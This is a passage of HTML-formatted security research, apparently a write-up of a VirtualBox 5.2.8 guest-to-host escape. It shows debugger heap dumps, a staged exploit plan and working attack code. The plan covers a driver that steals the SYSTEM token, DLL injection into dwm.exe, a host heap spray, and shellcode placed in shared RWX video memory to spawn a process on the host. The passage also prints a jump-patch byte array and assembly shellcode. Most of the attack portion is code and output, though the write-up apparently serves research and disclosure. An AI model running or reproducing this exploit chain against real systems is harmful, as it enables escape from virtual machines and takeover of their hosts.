class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f522258853861-23\"><span class=\"crayon-i\">gef<\/span>\u27a4<span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">8gx<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">rax<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">0x10<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f522258853861-24\"><span class=\"crayon-cn\">0x7fb79cf983b0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000000090<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000000035<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f522258853861-25\"><span class=\"crayon-cn\">0x7fb79cf983c0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fb79d12dc40<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fb700000000<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f522258853861-26\"><span class=\"crayon-cn\">0x7fb79cf983d0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007fb79cc7b8d0<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00007f0100000000<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f522258853861-27\"><span class=\"crayon-cn\">0x7fb79cf983e0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x0000000000010101<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x00000000000000e5<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0084 seconds] -->  <\/p>\n<p>As you can see, $rax holds a pointer to the second H3DORInstance from the bottom (0x7fb79cf983c0) and the first qword is a pointer to malloc_chunk of another freed H3DORInstance (0x7fb79d12dc50-0x10).<\/p>\n<p>The main thing required to exploit this vulnerability is to be able to create an arbitrary number of H3DORInstance-s and to spray the heap around it to point [[$rax]+0x320] to an executable code we control.<\/p>\n<p><strong>Exploit<\/strong><br \/> The exploit contains three parts:<\/p>\n<ul>\n<li>Guest usermode executable launcher (vrdpexploit_launcher.exe)<\/li>\n<li>Guest usermode library to inject in dwm.exe process (hostid_hijacker.dll)<\/li>\n<li>Guest kernelmode driver (vrdpexploit.sys)<\/li>\n<\/ul>\n<p>The exploit requires an elevated privileges to load the driver. In theory, on OSes other than Windows 10 the privileges may not be required.<\/p>\n<p><b>Exploitation Algorithm<\/b><\/p>\n<ol>\n<li>An attacker runs vrdpexploit_launcher.exe with elevated privileges.<\/li>\n<li>Stage 1: escalation\n<ol>\n<li>The launcher loads the driver.<\/li>\n<li>The driver escalates privileges of the launcher process and dwm.exe process to SYSTEM.<\/li>\n<\/ol>\n<\/li>\n<li>Stage 2: hijacking\n<ol>\n<li>The launcher injects the library to dwm.exe process and hijacks an identifier required to successfully spray the host heap later.<\/li>\n<li>The hijacked identifier is returned to the launcher.<\/li>\n<\/ol>\n<\/li>\n<li>Stage 3: exploitation\n<ol>\n<li>The launcher suspends dwm.exe process to stop any guest-host communication related to a display updating. The display is &#8220;freezed&#8221;.<\/li>\n<li>The driver connect to the Chromium service on the host via HGSMI (Host-Guest Shared Memory Interface).<\/li>\n<li>The drivers sends a Chromium command to make an information leak and obtain host addresses.<\/li>\n<li>The driver sends commands to the host to spray the heap.<\/li>\n<li>The driver writes a shellcode to video memory. VRAM is shared between the guest and the host, on the host side a mapped VRAM region has RWX attributes set.<\/li>\n<li>The driver reverts dwm.exe privileges back.<\/li>\n<\/ol>\n<\/li>\n<li>Final stage\n<ol>\n<li>An attacker closes RDP connection to trigger an execution of the shellcode in VRAM on the host to spawn \/usr\/bin\/xterm.<\/li>\n<li>On the guest, the loader continues dwm.exe process and exits itself. The display is &#8220;unfreezed&#8221;, the VM continues to work.<\/li>\n<\/ol>\n<\/li>\n<\/ol>\n<p><b>Details<\/b><br \/> <i>Stage 1: Escalation<\/i><br \/> The launcher (vrdpexploit_launcher.exe) loads the driver (vrdpexploit.sys) and sends IOCTL_ESCALATE request. The driver finds EPROCESS of System, the launcher, and dwm.exe processes. Then it saves an access token of dwm.exe process to revert it back after the exploitation, and replaces tokens of the launcher and dwm.exe with a token of System.<\/p>\n<p><i>Stage 2: Hijacking<\/i><br \/> Reflective DLL Injection tool by Stephen Fewer is used to simplify an injection. When the library (hostid_hijacker.dll) is injected into dwm.exe it patches the following code to jump to a shellcode.<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5b7b3e582f52d507677593\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> (\/VirtualBox-5.2.8\/src\/VBox\/Additions\/WINNT\/Graphics\/Video\/disp\/wddm\/VBoxDispD3D.cpp)  static HRESULT APIENTRY vboxWddmDDevPresent(HANDLE hDevice, CONST D3DDDIARG_PRESENT* pData)  {  &#8230;  #ifdef VBOX_WITH_CROGL          if (pAdapter-&gt;u32VBox3DCaps &amp; CR_VBOX_CAP_TEX_PRESENT)          {              IDirect3DSurface9 *pSrcSurfIf = NULL;              hr = VBoxD3DIfSurfGet(pSrcRc, pData-&gt;SrcSubResourceIndex, &amp;pSrcSurfIf);  &#8230;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f52d507677593-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f52d507677593-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f52d507677593-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f52d507677593-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f52d507677593-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f52d507677593-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f52d507677593-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f52d507677593-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f52d507677593-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f52d507677593-10\">10<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f52d507677593-1\"><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">VirtualBox<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">5.2.8<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">src<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">VBox<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">Additions<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">WINNT<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">Graphics<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">Video<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">disp<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">wddm<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">VBoxDispD3D<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">cpp<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f52d507677593-2\"><span class=\"crayon-m\">static<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">HRESULT <\/span><span class=\"crayon-e\">APIENTRY <\/span><span class=\"crayon-e\">vboxWddmDDevPresent<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">HANDLE <\/span><span class=\"crayon-v\">hDevice<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-m\">CONST<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">D3DDDIARG_PRESENT*<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">pData<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f52d507677593-3\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f52d507677593-4\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f52d507677593-5\"><span class=\"crayon-p\">#ifdef VBOX_WITH_CROGL<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f52d507677593-6\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">pAdapter<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">u32VBox3DCaps<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">CR_VBOX_CAP_TEX_PRESENT<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f52d507677593-7\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f52d507677593-8\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">IDirect3DSurface9 *<\/span><span class=\"crayon-v\">pSrcSurfIf<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">NULL<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f52d507677593-9\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">hr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">VBoxD3DIfSurfGet<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">pSrcRc<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">pData<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">SrcSubResourceIndex<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">pSrcSurfIf<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f52d507677593-10\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0024 seconds] -->  <\/p>\n<p class=\"Textbody\"><span lang=\"RU\">The patch modifies the code right after VBoxD3DIfSurfGet call:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5b7b3e582f53a853480727\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> BYTE gPatch[] =  &#8220;xE8x00x00x00x00&#8221;                      \/\/ call $5  &#8220;x58&#8221;                                      \/\/ pop rax  &#8220;x48x83xE8x05&#8221;                          \/\/ sub rax, 5  &#8220;x50&#8221;                                      \/\/ push rax  &#8220;x48xB8x41x41x41x41x41x41x41x41&#8221;  \/\/ mov rax, 0x4141414141414141  &#8220;x50&#8221;                                      \/\/ push rax  &#8220;xC3&#8221;;                                     \/\/ ret<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f53a853480727-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f53a853480727-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f53a853480727-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f53a853480727-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f53a853480727-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f53a853480727-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f53a853480727-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f53a853480727-8\">8<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f53a853480727-1\"><span class=\"crayon-t\">BYTE<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">gPatch<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f53a853480727-2\"><span class=\"crayon-s\">&#8220;xE8x00x00x00x00&#8221;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/ call $5<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f53a853480727-3\"><span class=\"crayon-s\">&#8220;x58&#8221;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/ pop rax<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f53a853480727-4\"><span class=\"crayon-s\">&#8220;x48x83xE8x05&#8221;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/ sub rax, 5<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f53a853480727-5\"><span class=\"crayon-s\">&#8220;x50&#8221;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/ push rax<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f53a853480727-6\"><span class=\"crayon-s\">&#8220;x48xB8x41x41x41x41x41x41x41x41&#8221;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/ mov rax, 0x4141414141414141<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f53a853480727-7\"><span class=\"crayon-s\">&#8220;x50&#8221;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/ push rax<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f53a853480727-8\"><span class=\"crayon-s\">&#8220;xC3&#8221;<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-c\">\/\/ ret<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0011 seconds] -->  <\/p>\n<p>At startup time, before patching, the library modifies 0x4141414141414141 with an address of the shellcode.<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5b7b3e582f540970066329\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> PUBLIC Shellcode    EXTERN gHostId: DWORD  EXTERN RestoreBytes: PROC    .CODE    Shellcode PROC    \t; We should preserve all the registers because it&#8217;s not known  \t; what of them will be used in RestoreBytes()  \tpush rax  \tpush rbx  \tpush rcx  \tpush rdx  \tpush rsi  \tpush rdi  \tpush r8  \tpush r9  \tpush r10  \tpush r11  \tpush r12  \tpush r13  \tpush r14  \tpush r15    \t; IDirect3DSurface9* pSrcSurfIf = [rsp + 0260h]  \t; We add 8 to because the shellcode is call&#8217;ed by the patch  \t; We also add 112 to account all the push&#8217;es (8 * 14)  \tmov rax, qword ptr [rsp + 0260h + 08h + 070h];    \t; wined3d_surface* surface = ((d3d9_surface*)pSrcSurfIf)-&gt;wined3d_surface  \tmov rax, qword ptr [rax + 010h]    \t; uint32_t hostId = surface-&gt;texture_name  \tmov eax, dword ptr [rax + 0F4h]    \t; Save Host ID  \tmov dword ptr [gHostId], eax    \t; Replace the patch with original bytes so the shellcode will not be called anymore  \tcall RestoreBytes    \tpop r15  \tpop r14  \tpop r13  \tpop r12  \tpop r11  \tpop r10  \tpop r9  \tpop r8  \tpop rdi  \tpop rsi  \tpop rdx  \tpop rcx  \tpop rbx  \tpop rax    \tret    Shellcode ENDP    END<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f540970066329-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f540970066329-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f540970066329-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f540970066329-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f540970066329-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f540970066329-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f540970066329-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f540970066329-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f540970066329-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f540970066329-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f540970066329-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f540970066329-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f540970066329-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f540970066329-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f540970066329-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f540970066329-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f540970066329-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f540970066329-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f540970066329-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f540970066329-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f540970066329-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f540970066329-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f540970066329-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f540970066329-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f540970066329-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f540970066329-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f540970066329-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f540970066329-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f540970066329-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f540970066329-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f540970066329-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f540970066329-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f540970066329-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f540970066329-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f540970066329-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" 